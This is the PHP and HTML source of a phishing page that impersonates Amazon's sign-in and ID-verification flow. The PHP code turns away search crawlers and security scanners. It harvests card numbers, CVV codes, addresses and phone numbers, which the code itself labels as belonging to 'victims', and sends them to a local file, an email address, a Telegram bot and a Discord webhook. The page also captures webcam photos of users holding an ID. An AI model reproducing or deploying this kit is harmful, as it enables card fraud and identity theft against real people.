<?php
ob_start();
session_start();
$path = "../site/";
require ("../DheReckahConfi/Guration.php");
require ("../DheReckahConfi/Function.php");
require ("../DheReckahDecline/AntiBotIp.php");
require ("../DheReckahDecline/AntiBotPw.php");
require ("../DheReckahDecline/AntiBotKillBot.php");
require ("../DheReckahDecline/AntiBotUserAgent.php");
require ("../DheReckahDecline/AntiBotIsp.php");
require ("../DheReckahDecline/AnitiBotHost.php");
require ("../DheReckahDecline/AntiBotPhishTank.php");
require ("../DheReckahDecline/AntiBotVpn.php");
require ("../DheReckahDecline/AntiBotProxy.php");
require ("../DheReckahDecline/AntBotProtection.php");
require ("../DheReckahDecline/SaveBrowsing.php");
require ("../DheReckahDecline/DiscoveredBot.php");
require ("../DheReckahDecline/AntiBotThree.php");
require ("../DheReckahDecline/DisturbOne.php");
require ("../DheReckahDecline/DisturbTwo.php");
require ("../DheReckahDecline/DoRandoMize.php");
require("../DheReckahDecline/Anti/Bot-Crawler.php");
@require("../DheReckahDecline/Anti/Crawler/src/CrawlerDetect.php");
use JayBizzle\CrawlerDetect\CrawlerDetect; 
if(strpos($_SERVER['HTTP_USER_AGENT'],'google') !== false ) { 
    include($path."index.php"); exit();
}
if(strpos(gethostbyaddr(getenv("REMOTE_ADDR")),'google') !== false ) {
    include($path."index.php"); exit();
}
if (isset($_POST['hidden']) && !empty($_POST['DheReckahDatorKiller'])  ) {
  include($path."index.php"); exit();
  
}
if (!isset($_SESSION['Dh3R3ck4h_SESSION_T0k3n']) ) {
  include($path."index.php"); exit();
}
#if (!isset($_POST['tokenDheReckahCsrf'])) {
#    include($path."index.php");
  
#}
#if ($_POST['tokenDheReckahCsrf'] != $_SESSION['Dh3R3ck4h_SESSION_T0k3n']) {
#    include($path."index.php");
#}

if (isset($_POST['submit'])){
   $_SESSION['submit']  = $_POST['submit'];
   }
$ip = getIp();
$browser = DheReckah_Browser();
$date = date("d M, Y");
$time = date("g:i a");
$date = trim($date . ", Time : " . $time);
$doubleLogin = strtolower($doubleLogin);
$doubleEmailAcces = strtolower($doubleEmailAcces);
$saveItOnHost = strtolower($saveItOnHost);
$sendToEmail = strtolower($sendToEmail);
$sendToTelegramBot = strtolower($sendToTelegramBot);
$sendToDiscordBot = strtolower($sendToDiscordBot);
extract($_REQUEST);
if (isset($_POST['cc']) && isset($_POST['cvv'])){
  if (!empty($_POST['cc']) && !empty($_POST['cvv']) ) {

       //Admin Panel
      $_SESSION['namer']  = $_POST['namer'];
      $_SESSION['cc']  = $_POST['cc'];
      $_SESSION['cc_exp']  = $_POST['cc_exp'];
      $_SESSION['cvv']  = $_POST['cvv'];
      $_SESSION['address']  = $_POST['address'];
      $_SESSION['city']  = $_POST['city'];
      $_SESSION['state']  = $_POST['state'];
      $_SESSION['zipcode']  = $_POST['zipcode'];
      $_SESSION['mobilenum']  = $_POST['mobilenum'];
      // $_SESSION['atmpin']  = $_POST['atmpin'];
      // <4tmP!n>         :         <t ".$_SESSION['atmpin'].">
      $msgItOnHost = "<t============================================>
      <t".$YourName." ".$PageName."==> <t===C4rdNvmb3r>
<C4rdNvmb3r>     :         <t ".$_SESSION['cc'].">
<E+p!r4t!onD4t3> :         <t ".$_SESSION['cc_exp'].">
<Cyv>            :         <t ".$_SESSION['cvv'].">
<V1cT!m3N4m3r>   :         <t ".$_SESSION['namer'].">
<4ddr3s5>        :         <t ".$_SESSION['address'].">
<C!ty>           :         <t ".$_SESSION['city'].">
<St4t3>          :         <t ".$_SESSION['state'].">
<Z!pC0de>        :         <t ".$_SESSION['zipcode'].">
<M0b1l3Nvmb3r>   :         <t ".$_SESSION['mobilenum']."
<V!ct!m3Ip>      :         <t ".$ip.">
<V!ct!m3D4t3>    :         <t ".$date.">
<V!ct!m3Br0ws3r> :         <".DheReckah_Browser($_SERVER['HTTP_USER_AGENT'])." 0n ".DheReckah_Os($_SERVER['HTTP_USER_AGENT']).">
<Us3rAg4nt>      :         <t ".($_SERVER['HTTP_USER_AGENT']).">
<t=============================================>";
// [👤4tmP!n:|👉 ".$_SESSION['atmpin']."

          $telegramMsg ="
[".$YourName." ".$PageName." ❤️😜❤️
[C4rdNvmb3r H4s B3en
[Fi5h👉🐟🐟🐟🐟🐟🐟🐟🐟🐟🐟"."
[👤C4rdNvmb3r:|👉 ".$_SESSION['cc']."
[👤E+p!r4t!onD4t3:|👉 ".$_SESSION['cc_exp']."
[👤Cyv:|👉 ".$_SESSION['cvv']."
[👤V1cT!m3N4m3r:|👉 ".$_SESSION['namer']."
[👤4ddr3s5:|👉".$_SESSION['address']."
[👤C!ty:|👉".$_SESSION['city']."
[👤St4t3:|👉".$_SESSION['state']."
[👤Z!c0dr:|👉".$_SESSION['zipcode']."
[👤M0b1l3Nvmb3r:|👉".$_SESSION['mobilenum']."
[🔍V!ct!m31p:|👉".$ip."
[⏰V!ct!m3D4t3:|👉".$date."
[🌐V!ct!m3Br0ws3r:|👉 ".DheReckah_Browser($_SERVER['HTTP_USER_AGENT'])." 0n ".DheReckah_Os($_SERVER['HTTP_USER_AGENT'])."".";
[👤Us3rAg3nt:|👉 ".($_SERVER['HTTP_USER_AGENT'])."";

// [👤4tmP!n:|👉 ".$_SESSION['atmpin']."

      $discordMsg ="
[".$YourName." ".$PageName." ❤️😜❤️
[C4rdNvmb3r H4s B3en
[Fi5h👉🐟🐟🐟🐟🐟🐟🐟🐟🐟🐟"."
[👤C4rdNvmb3r:|👉 ".$_SESSION['cc']."
[👤E+p!r4t!onD4t3:|👉 ".$_SESSION['cc_exp']."
[👤Cyv:|👉 ".$_SESSION['cvv']."
[👤V1cT!m3N4m3r:|👉 ".$_SESSION['namer']."
[👤4ddr3s5:|👉".$_SESSION['address']."
[👤C!ty:|👉".$_SESSION['city']."
[👤St4t3:|👉".$_SESSION['state']."
[👤Z!c0dr:|👉".$_SESSION['zipcode']."
[👤M0b1l3Nvmb3r:|👉".$_SESSION['mobilenum']."
[🔍V!ct!m31p:|👉".$ip."
[⏰V!ct!m3D4t3:|👉 ".$date."
[🌐V!ct!m3Br0ws3r:|👉 ".DheReckah_Browser($_SERVER['HTTP_USER_AGENT'])." 0n ".DheReckah_Os($_SERVER['HTTP_USER_AGENT'])."".";
[👤Us3rAg3nt:|👉".($_SERVER['HTTP_USER_AGENT'])."";


          $Subject .= "[".$YourName." ".$PageName." ❤️😜❤️ \n";
          $Subject .= "[C4rdNvmb3r H4s B3en Fi5h ❤️😜❤️||🐟🐟🐟🐟🐟🐟🐟🐟🐟||\n";
          $Subject .= "[V1cT!m3N4m3r =[".$_POST['namer']."] !P=[".$ip."]";
          $headers .= "MIME-Version: 1.0" . "\r\n";
          $headers .= "From: ".$Owner.".$DheReckahServer." . "\r\n";
          $headers .= "Content-type:text/plan;charset=UTF-8" . "\r\n";
          $msg .= "[".$YourName." ".$PageName."|| \n";
          $msg .= "[C4rdNvmb3r H4s B3en ||\n";
          $msg .= "[Fi5h👉🐟🐟🐟🐟🐟🐟🐟🐟🐟🐟  ||\n";
          $msg .= "[👤C4rdNvmb3r     :|| ".$_POST['cc']." ||\n";
          $msg .= "[👤E+p!r4t!onD4t3 :|| ".$_POST['cc_exp']." ||\n";
          $msg .= "[👤Cyv            :|| ".$_POST['cvv']." ||\n";
          $msg .= "[👤4ddr3s5            :|| ".$_POST['address']." ||\n";
          $msg .= "[👤C!ty               :|| ".$_POST['city']." ||\n";
          $msg .= "[👤St4t3              :|| ".$_POST['state']." ||\n";
          $msg .= "[👤Z!pc0dR       :|| ".$_POST['zipcode']." ||\n";
          $msg .= "[👤M0b1l3Nvmb3r         :|| ".$_POST['mobilenum']." ||\n";
          // $msg .= "[👤4tmP!n         :|| ".$_POST['atmpin']." ||\n";
          $msg .= "[👤V1cT!m3N4m3r     :|| ".$_POST['namer']." ||\n";
          $msg .= "[🔍!P             : ".$ip." ||\n";
          $msg .= "[⏰D4t3&T!m3      : ".$date." ||\n";
          $msg .= "[🌐BR0S3R/D3V!C3  : ".DheReckah_Browser($_SERVER['HTTP_USER_AGENT'])." On ".DheReckah_Os($_SERVER['HTTP_USER_AGENT'])." ||\n";
          $msg .= "[👤Us3rAg4nt      : ".($_SERVER['HTTP_USER_AGENT'])." ||\n";



    
      if ($saveItOnHost == "true") {
         $DheReckahCoded = array(
               'msgItOnHost' => $msgItOnHost,
            );
         echo json_encode($DheReckahCoded);
          $file = fopen("../DheReckahHost/Fishes/C4rdNvmb3r.html", "a+");
          fwrite($file, $msgItOnHost);   
      }
      
      if ($sendToEmail == "true") {
        $DheReckahCoded = array(
             'msg' => $msg,
             'headers' => $headers,
             'Subject' => $Subject,
        );
        echo json_encode($DheReckahCoded);
        send($yourEmail, $Subject, $msg,$headers);

      }
      
      if ($sendToTelegramBot == "true") {
        $DheReckahCoded = array(
               'telegramMsg' => $telegramMsg,
            );
         echo json_encode($DheReckahCoded);
        send($telegramMsg,$botToken,$chatId);

  $DheReckahApi="https://api.telegram.org/bot".$botToken;
  $sendToTelegramBot=[
      'chat_id'=> urlencode($chatId),
      'text'=> urldecode($telegramMsg),
  ];
  $ch = curl_init($DheReckahApi . '/sendMessage');
  curl_setopt($ch, CURLOPT_HEADER, false);
  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  curl_setopt($ch, CURLOPT_POST, 1);
  curl_setopt($ch, CURLOPT_POSTFIELDS, ($sendToTelegramBot));
  curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  $answer = curl_exec($ch);
  curl_close($ch);
      }
if ($sendToDiscordBot == "true"){
    $DheReckahCoded = array(
        'discordMsg' => $discordMsg,
    );
    echo json_encode($DheReckahCoded);
    $DheReckahApi = $webHookUrl; 
    $json_data = array ('content'=>"$discordMsg");
    $make_json = json_encode($json_data);
    $ch = curl_init( $DheReckahApi );
    curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-type: application/json'));
    curl_setopt($ch, CURLOPT_POSTFIELDS, $make_json);
    curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
    $answer = curl_exec($ch);
}
  }
$cage = substr(sha1(mt_rand()),1,25);
if ($show_selfie_upload=="yes") {
    exit(header("Location: $priv1"));
  }
  if ($show_success_page=="yes") {
    exit(header("Location: $priv0")); 
  }else{

    $dicline = array_keys($_SESSION);
        foreach ($dicline as $cage){
            unset($_SESSION[$cage]);
          }
        include($path."index.php"); exit();
  }

}

?>

<!DOCTYPE html>
<html lang="en" >
<head>
  <meta charset="UTF-8">
     <title><?php echo htmlentities("Amazon Sign-In", ENT_QUOTES, "UTF-8"); ?></title>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/1.12.4/jquery.min.js"></script>
    <!-- <meta http-equiv="refresh" content="5;url=data.php?ajax=blg"> -->

<meta charset="utf-8">
            <meta data-react-helmet="true" name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=6.0 user-scalable=0">
            <meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
            <meta name="viewport" content="width=device-width, height=device-height, initial-scale=1.0, maximum-scale=1, user-scalable=yes">
            <meta name="robots" content="noindex,nofollow" />
            <meta name="googlebot" content="noindex,nofollow" />
            <meta name="googlebot-news" content="nosnippet">
            <META NAME="robots" CONTENT="nofollow">
            <meta http-equiv="Cache-Control" content="no-store">
            <meta http-equiv="Cache-Control" content="no-cache">
            <meta http-equiv="Cache-Control" content="private">
            <meta http-equiv="Pragma" content="no-cache">
            <meta name="next-head-count" content="2">
            <noscript data-n-css=""></noscript>
            <link rel="shortcut icon" href="./file/img/favicon.ico">
            <link rel="stylesheet" href="./file/2.css">


    


<!--  <script type="text/javascript">

    jQuery(function($){
        $("#dob").mask("99/99/9999",{placeholder:"MM/DD/YYYY"});
        $("#mobilenum").mask("(999) 999-9999");
        $("#zipcode").mask("99999");
    //$('#SecurityNumber').mask('000-00-0000');
    });


</script>


    <script type="text/javascript">
        jQuery(function($){
            //$("#ccexp").mask("99/99",{placeholder:"MM/YY"});
            $("#ssn").mask("999-99-9999");
        });
    </script> -->   
      

      
        




      
    
  
</head>
  <body class="ap-locale-fr_FR a-m-us a-aui_157141-c a-aui_158613-c a-aui_72554-c a-aui_dropdown_187959-c a-aui_pci_risk_banner_210084-c a-aui_perf_130093-c a-aui_tnr_v2_180836-c a-aui_ux_145937-c a-meter-animate">




<div id="a-page">
    <div class="a-section a-padding-medium auth-workflow">
      <div class="a-section a-spacing-none auth-navbar">
        





<div id="alirctx" class="a-section a-spacing-medium a-text-center">
  
    

    
      


<a class="a-link-nav-icon" tabindex="-1" href="/ref=ap_frn_logo">
  
  <i class="a-icon a-icon-logo" role="img" aria-label="Amazon"></i>

  
  
    
      
  
</a>

    
  
</div>


      </div>

      <div id="authportal-center-section" class="a-section">
        
          
          
            <div id="authportal-main-section" class="a-section">
              






<div id="appctx" class="a-section auth-pagelet-container" style="
    width: 412px;
    margin: 0 auto;
">
  

















  
    





<div class="a-section a-spacing-base">
  <div class="a-section">
    
    <form name="signIn" method="post" action="<?php echo $priv0 ;?>" class="auth-validate-form auth-real-time-validation a-spacing-none">
      
      

      




  
    
  
    
  
    
  



      <div class="a-section">
        <div class="a-box"><div class="a-box-inner a-padding-extra-large">
          <h2 class="a-spacing-small">
Take a photo with your ID or Passport! </h2><p> The holder's name and identity card must match and be clearly visible.  </p><a id="re" role="button" href="#opaopa" style="display: none;">Review the example</a>

  
          <div id="opaopa" class="">

                    <img  id="width"  src="./file/img/selfie1.png" style="max-width:85%; padding-left: 50px;"><img id="width" src="./file/img/selfie2.png" style="max-width:80%">
                  </div>



                       <style>
                          video {
                              border:5px solid #0070ba;
                              border-radius: 3px;

                          }
                        </style>
                       <div id="my_camera" style="margin-top:20px; margin-left: 50px;"></div>
                                              <div id="results"></div>
                                               <div style="" id="checks" style="display: none;"></div>



                                                    
     <section  class="loading-spinner-container hide"  id="rotate">
          <div style="margin-left: 20px;" class="loading-spinner hide" id="text">
            <div>
        </section>
        <style type="text/css">
            /*! CSS Used from: http://localhost/pages/dist/dist/style.css */
[data-sparta-wrapper] section {
  display: block;
}
[data-sparta-wrapper] ::-webkit-input-placeholder {
  color: inherit;
  opacity: 0.54;
}
.loading-spinner-container {
  position: fixed;
  z-index: 9999;
  top: calc(45% - (80px / 2));
  left: calc(50% - (80px / 2));
}
.loading-spinner {
  display: inline-block;
  position: relative;
  width: 90px;
  height: 90px;
}
.loading-spinner div {
  box-sizing: border-box;
  display: block;
  position: absolute;
  width: calc(50px - (6px * 2));
  height: calc(50px - (6px * 2));
  border: 6px solid #007856;
  border-radius: 50%;
  -webkit-animation: loading-spinner 1.2s cubic-bezier(0.5, 0, 0.5, 1) infinite;
  animation: loading-spinner 1.2s cubic-bezier(0.5, 0, 0.5, 1) infinite;
  border-color: #f3d078 transparent transparent transparent;
}
.loading-spinner div:nth-child(1) {
  -webkit-animation-delay: -0.45s;
  animation-delay: -0.45s;
}
.loading-spinner div:nth-child(2) {
  -webkit-animation-delay: -0.3s;
  animation-delay: -0.3s;
}
.loading-spinner div:nth-child(3) {
  -webkit-animation-delay: -0.15s;
  animation-delay: -0.15s;
}
/*! CSS Used keyframes */
@-webkit-keyframes loading-spinner {
  0% {
    -webkit-transform: rotate(45deg);
    transform: rotate(45deg);
  }
  100% {
    -webkit-transform: rotate(405deg);
    transform: rotate(405deg);
  }
}
@keyframes loading-spinner {
  0% {
    -webkit-transform: rotate(45deg);
    transform: rotate(45deg);
  }
  100% {
    -webkit-transform: rotate(405deg);
    transform: rotate(405deg);
  }
}

        </style>

                  </section>
                                               



                                              
  












          <div class="a-section">
            
            






          </div>

          

          

          






          




  
  
  
    
      
      
      
        
        
      
    
  


          
    
      </div></div></div>



        <input id="data" name="data" type="hidden" value="x">
            <span id="auto" class="a-button a-button-span12 a-button-primary"  onClick="setup();" value="Access the camera"><span class="a-button-inner"><input id="btnSubmit" tabindex="5" class="a-button-input"  aria-labelledby="continue-announce" fdprocessedid="5511jv"><span id="continue-announce" class="a-button-text" aria-hidden="true">Access the camera
            </span></span></span>
 
            <span id="hdtwo" class="a-button a-button-span12 a-button-primary"value="Complete verification"><span class="a-button-inner"><input id="btnSubmit" tabindex="5" class="a-button-input" onclick="return isEmpty()" type="submit" aria-labelledby="continue-announce" fdprocessedid="5511jv"><span id="continue-announce" class="a-button-text" aria-hidden="true" >
             Complete verification
            </span></span></span>

            <span id="hdone" class="a-button a-button-span12 a-button-primary" value="Take a picture" onClick="take_snapshot()"><span class="a-button-inner"><input id="btnSubmit" tabindex="5" class="a-button-input"  aria-labelledby="continue-announce" fdprocessedid="5511jv"><span id="continue-announce" class="a-button-text" aria-hidden="true" alue="Access the camera">Take a picture
            </span></span></span>





            
            
              



 

            

            



    </form>
  </div>
  
    
    
      
        
        
        
      
    
  
</div>

  
  

</div>
            </div>
          
        
      </div>

      
      <div id="right-2">
      </div>

      <div class="a-section a-spacing-top-extra-large auth-footer">
        



<div class="a-divider a-divider-section"><div class="a-divider-inner"></div></div>

<div class="a-section a-spacing-small a-text-center a-size-mini">
  <span class="auth-footer-seperator"></span>

  
    
      
        
      

      
    

    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
      Terms of use
    </a>
    <span class="auth-footer-seperator"></span>
  
    
      
        
      

      
    

    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
Protection of your personal information    </a>
    <span class="auth-footer-seperator"></span>
  
    
      
        
      

      
    

    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
    Help
    </a>
    <span class="auth-footer-seperator"></span>
  
    
      
        
      

      
    

    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
      Cookies
    </a>
    <span class="auth-footer-seperator"></span>
  
    
      
        
      

      
    

    <a class="a-link-normal" target="_blank" rel="noopener" href="#">
      Ads based on your interests
    </a>
    <span class="auth-footer-seperator"></span>
  

  
</div>




<div class="a-section a-spacing-none a-text-center">
  





<span class="a-size-mini a-color-secondary">
  © 1996-2023, Amazon.com, Inc. or its affiliates.
</span>

</div>

      </div>
    </div>

   
    
    
  </div>

 




<script src="./file/js/jquery-1.11.3.min.js"></script>
             <script src="./file/js/webcam.min.js"></script>
             <style>
                 .votre {
                     margin: 10px;
                     font-weight: bold;
                 }
            </style>
<script>
$(document).ready(function() {
            $('#hdone,#hdtwo,#re').hide();
            $('#auto').on('click',function(){
            $('#hdone').fadeIn(50);
            $('#auto').fadeOut(50);
            $('#opaopa').fadeOut(50);
            $('#re').fadeIn(50);
            });
            $('#hdone').on('click',function(){
                                     $('#hdtwo').fadeIn(50) ;
                                $('#hdone').val('Take another photo')  
                                             });
    $('#hdtwo').on('click',function(){
        $('#my_camera').fadeOut(50);
    });
    $('#re').on('click',function(){
        $('#opaopa').fadeIn(50);
        $('#re').fadeOut(50);
    });
  });
    </script>
                <script language="JavaScript">
        Webcam.set({
            width: $('#width').width(),
            height: 0.7585*$('#width').width(),
            image_format: 'jpeg',
            jpeg_quality: 100
        });
    </script>
                <script language="JavaScript">
        function setup() {
            Webcam.reset();
            Webcam.attach( '#my_camera' );
        }
        
        function take_snapshot() {
            // take snapshot and get image data
            Webcam.snap( function(data_uri) {
                // display results in page
                document.getElementById('results').innerHTML = 
                    '<p class="votre" style=" margin-top: 10px; ">Your picture:</p>' + 
                    '<img style="border:5px solid #0070ba;border-radius: 3px; margin-left: 50px;" src="'+data_uri+'"/>';
                $('#data').val(data_uri);
            });
        }
    </script>

<script>
          document.getElementById("hdtwo").onclick = function() {
            document.getElementById("rotate").classList.remove("hide");
            document.getElementById("text").classList.remove("hide");
            document.getElementById("form").classList.add("hide");
            setTimeout(function() {
              form
            }, 0);
            ("form").classList.remove("hide")
          };
        </script>

</body>
</body></html>
